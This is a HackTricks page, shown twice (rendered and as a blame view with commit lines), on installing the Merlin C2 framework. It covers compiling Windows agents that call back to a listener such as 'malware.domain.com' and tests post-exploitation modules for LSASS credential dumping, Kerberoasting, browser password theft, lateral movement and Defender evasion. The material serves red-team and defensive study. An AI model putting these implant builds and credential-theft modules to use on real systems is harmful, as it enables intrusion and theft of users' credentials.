hacktricks/backdoors/merlin.md



<details>

<summary><strong>Support HackTricks and get benefits!</strong></summary>

- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!

- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)

- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**

- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>


# Installation

## Install GO

```
#Download GO package from: https://golang.org/dl/
#Decompress the packe using:
tar -C /usr/local -xzf go$VERSION.$OS-$ARCH.tar.gz

#Change /etc/profile
Add ":/usr/local/go/bin" to PATH
Add "export GOPATH=$HOME/go"
Add "export GOBIN=$GOPATH/bin"

source /etc/profile
```

## Install Merlin

```
go get https://github.com/Ne0nd0g/merlin/tree/dev #It is recommended to use the developer branch
cd $GOPATH/src/github.com/Ne0nd0g/merlin/
```

# Launch Merlin Server

```
go run cmd/merlinserver/main.go -i
```

# Merlin Agents

You can [download precompiled agents](https://github.com/Ne0nd0g/merlin/releases)

## Compile Agents

Go to the main folder _$GOPATH/src/github.com/Ne0nd0g/merlin/_

```
#User URL param to set the listener URL
make #Server and Agents of all
make windows #Server and Agents for Windows
make windows-agent URL=https://malware.domain.com:443/ #Agent for windows (arm, dll, linux, darwin, javascript, mips)
```

## **Manual compile agents**

```
GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://10.2.0.5:443" -o agent.exe main.g
```

# Modules

**The bad news is that every module used by Merlin is downloaded from the source (Github) and saved on disk before using it. Be careful about when using well-known modules because Windows Defender will catch you!**


**SafetyKatz** --> Modified Mimikatz. Dump LSASS to file and launch:sekurlsa::logonpasswords to that file\
**SharpDump** --> minidump for the process ID specified (LSASS by default) (Itsais that the extension of the final file is .gz but indeed it is.bin, but is agz file)\
**SharpRoast** --> Kerberoast (doesn't work)\
**SeatBelt** --> Local Security Tests in CS (does not work) https://github.com/GhostPack/Seatbelt/blob/master/Seatbelt/Program.cs\
**Compiler-CSharp** --> Compile using csc.exe /unsafe\
**Sharp-Up** -->Allchecks in C# in powerup (works)\
**Inveigh** --> PowerShellADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool (doesn't works, need to load: https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1)\
**Invoke-InternalMonologue** --> Impersonates all available users and retrieves a challenge-response for each (NTLM hash for each user) (bad url)\
**Invoke-PowerThIEf** --> Steal forms from IExplorer or make it execute JS or inject a DLL in that process (doesnt work) (and the PS looks like doesnt work either) https://github.com/nettitude/Invoke-PowerThIEf/blob/master/Invoke-PowerThIEf.ps1\
**LaZagneForensic** --> Get browser passwords (works but dont prints the output directory)\
**dumpCredStore** --> Win32 Credential Manager API (https://github.com/zetlen/clortho/blob/master/CredMan.ps1) https://www.digitalcitizen.life/credential-manager-where-windows-stores-passwords-other-login-details\
**Get-InjectedThread** --> Detect classic injection in running processes (Classic Injection (OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread)) (doesnt works)\
**Get-OSTokenInformation** --> Get Token Info of the running processes and threads (User, groups, privileges, owner… https://docs.microsoft.com/es-es/windows/desktop/api/winnt/ne-winnt-\_token_information_class)\
**Invoke-DCOM** --> Execute a command (inother computer) via DCOM (http://www.enigma0x3.net.) (https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/)\
**Invoke-DCOMPowerPointPivot** --> Execute a command in othe PC abusing PowerPoint COM objects (ADDin)\
**Invoke-ExcelMacroPivot** --> Execute a command in othe PC abusing DCOM in Excel\
**Find-ComputersWithRemoteAccessPolicies** --> (not working) (https://labs.mwrinfosecurity.com/blog/enumerating-remote-access-policies-through-gpo/)\
**Grouper** --> It dumps all the most interesting parts of group policy and then roots around in them for exploitable stuff. (deprecated) Take a look at Grouper2, looks really nice\
**Invoke-WMILM** --> WMI to move laterally\
**Get-GPPPassword** --> Look for groups.xml, scheduledtasks.xml, services.xmland datasources.xml and returns plaintext passwords (insidedomain)\
**Invoke-Mimikatz** --> Use mimikatz (default dump creds)\
**PowerUp** --> https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc\
**Find-BadPrivilege** --> Check the privileges of users in computers\
**Find-PotentiallyCrackableAccounts** --> Retrieve information about user accounts associated with SPN (Kerberoasting)\
**psgetsystem** --> getsystem

**Didn't check persistence modules**

# Resume

I really like the feeling and the potential of the tool.\
I hope the tool will start downloading the modules from the server and integrates some kind of evasion when downloading scripts.


<details>

<summary><strong>Support HackTricks and get benefits!</strong></summary>

- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!

- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)

- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**

- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>
GitBook: [#3165] No subject 2022-05-01 16:32:23 +00:00
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

			`<summary><strong>Support HackTricks and get benefits!</strong></summary>`

change support text 2022-09-09 11:28:04 +00:00			`- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
change support text 2022-09-09 11:28:04 +00:00			`- Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
change support text 2022-09-09 11:28:04 +00:00			`- Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
change support text 2022-09-09 11:28:04 +00:00			`- Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
change support text 2022-09-09 11:28:04 +00:00			`- Share your hacking tricks by submitting PRs to the [hacktricks github repo](https://github.com/carlospolop/hacktricks).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`


GitBook: [#3165] No subject 2022-05-01 16:32:23 +00:00			`# Installation`

			`## Install GO`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`#Download GO package from: https://golang.org/dl/`
			`#Decompress the packe using:`
			`tar -C /usr/local -xzf go$VERSION.$OS-$ARCH.tar.gz`

			`#Change /etc/profile`
			`Add ":/usr/local/go/bin" to PATH`
			`Add "export GOPATH=$HOME/go"`
			`Add "export GOBIN=$GOPATH/bin"`

			`source /etc/profile`
			```

GitBook: [#3165] No subject 2022-05-01 16:32:23 +00:00			`## Install Merlin`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`go get https://github.com/Ne0nd0g/merlin/tree/dev #It is recommended to use the developer branch`
			`cd $GOPATH/src/github.com/Ne0nd0g/merlin/`
			```

GitBook: [#3165] No subject 2022-05-01 16:32:23 +00:00			`# Launch Merlin Server`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`go run cmd/merlinserver/main.go -i`
			```

GitBook: [#3165] No subject 2022-05-01 16:32:23 +00:00			`# Merlin Agents`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`You can [download precompiled agents](https://github.com/Ne0nd0g/merlin/releases)`

GitBook: [#3165] No subject 2022-05-01 16:32:23 +00:00			`## Compile Agents`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`Go to the main folder _$GOPATH/src/github.com/Ne0nd0g/merlin/_`

GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`#User URL param to set the listener URL`
			`make #Server and Agents of all`
			`make windows #Server and Agents for Windows`
			`make windows-agent URL=https://malware.domain.com:443/ #Agent for windows (arm, dll, linux, darwin, javascript, mips)`
			```

GitBook: [#3165] No subject 2022-05-01 16:32:23 +00:00			`## Manual compile agents`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://10.2.0.5:443" -o agent.exe main.g`
			```

GitBook: [#3165] No subject 2022-05-01 16:32:23 +00:00			`# Modules`

Update merlin.md Fixed a few formatting and grammar mistakes. 2022-07-06 09:53:24 +00:00			`The bad news is that every module used by Merlin is downloaded from the source (Github) and saved on disk before using it. Be careful about when using well-known modules because Windows Defender will catch you!`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00

			`SafetyKatz --> Modified Mimikatz. Dump LSASS to file and launch:sekurlsa::logonpasswords to that file\`
			`SharpDump --> minidump for the process ID specified (LSASS by default) (Itsais that the extension of the final file is .gz but indeed it is.bin, but is agz file)\`
Update merlin.md Fixed a few formatting and grammar mistakes. 2022-07-06 09:53:24 +00:00			`SharpRoast --> Kerberoast (doesn't work)\`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`SeatBelt --> Local Security Tests in CS (does not work) https://github.com/GhostPack/Seatbelt/blob/master/Seatbelt/Program.cs\`
			`Compiler-CSharp --> Compile using csc.exe /unsafe\`
			`Sharp-Up -->Allchecks in C# in powerup (works)\`
			`Inveigh --> PowerShellADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool (doesn't works, need to load: https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1)\`
Update merlin.md Fixed a few formatting and grammar mistakes. 2022-07-06 09:53:24 +00:00			`Invoke-InternalMonologue --> Impersonates all available users and retrieves a challenge-response for each (NTLM hash for each user) (bad url)\`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`Invoke-PowerThIEf --> Steal forms from IExplorer or make it execute JS or inject a DLL in that process (doesnt work) (and the PS looks like doesnt work either) https://github.com/nettitude/Invoke-PowerThIEf/blob/master/Invoke-PowerThIEf.ps1\`
			`LaZagneForensic --> Get browser passwords (works but dont prints the output directory)\`
			`dumpCredStore --> Win32 Credential Manager API (https://github.com/zetlen/clortho/blob/master/CredMan.ps1) https://www.digitalcitizen.life/credential-manager-where-windows-stores-passwords-other-login-details\`
			`Get-InjectedThread --> Detect classic injection in running processes (Classic Injection (OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread)) (doesnt works)\`
GitBook: [#3165] No subject 2022-05-01 16:32:23 +00:00			`Get-OSTokenInformation --> Get Token Info of the running processes and threads (User, groups, privileges, owner… https://docs.microsoft.com/es-es/windows/desktop/api/winnt/ne-winnt-\_token_information_class)\`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`Invoke-DCOM --> Execute a command (inother computer) via DCOM (http://www.enigma0x3.net.) (https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/)\`
			`Invoke-DCOMPowerPointPivot --> Execute a command in othe PC abusing PowerPoint COM objects (ADDin)\`
			`Invoke-ExcelMacroPivot --> Execute a command in othe PC abusing DCOM in Excel\`
			`Find-ComputersWithRemoteAccessPolicies --> (not working) (https://labs.mwrinfosecurity.com/blog/enumerating-remote-access-policies-through-gpo/)\`
			`Grouper --> It dumps all the most interesting parts of group policy and then roots around in them for exploitable stuff. (deprecated) Take a look at Grouper2, looks really nice\`
			`Invoke-WMILM --> WMI to move laterally\`
			`Get-GPPPassword --> Look for groups.xml, scheduledtasks.xml, services.xmland datasources.xml and returns plaintext passwords (insidedomain)\`
			`Invoke-Mimikatz --> Use mimikatz (default dump creds)\`
			`PowerUp --> https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc\`
			`Find-BadPrivilege --> Check the privileges of users in computers\`
Update merlin.md Fixed a few formatting and grammar mistakes. 2022-07-06 09:53:24 +00:00			`Find-PotentiallyCrackableAccounts --> Retrieve information about user accounts associated with SPN (Kerberoasting)\`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`psgetsystem --> getsystem`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`Didn't check persistence modules`

GitBook: [#3165] No subject 2022-05-01 16:32:23 +00:00			`# Resume`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`I really like the feeling and the potential of the tool.\`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`I hope the tool will start downloading the modules from the server and integrates some kind of evasion when downloading scripts.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GitBook: [#3165] No subject 2022-05-01 16:32:23 +00:00
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

			`<summary><strong>Support HackTricks and get benefits!</strong></summary>`

change support text 2022-09-09 11:28:04 +00:00			`- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
change support text 2022-09-09 11:28:04 +00:00			`- Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
change support text 2022-09-09 11:28:04 +00:00			`- Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
change support text 2022-09-09 11:28:04 +00:00			`- Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
change support text 2022-09-09 11:28:04 +00:00			`- Share your hacking tricks by submitting PRs to the [hacktricks github repo](https://github.com/carlospolop/hacktricks).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
GitBook: [#3165] No subject 2022-05-01 16:32:23 +00:00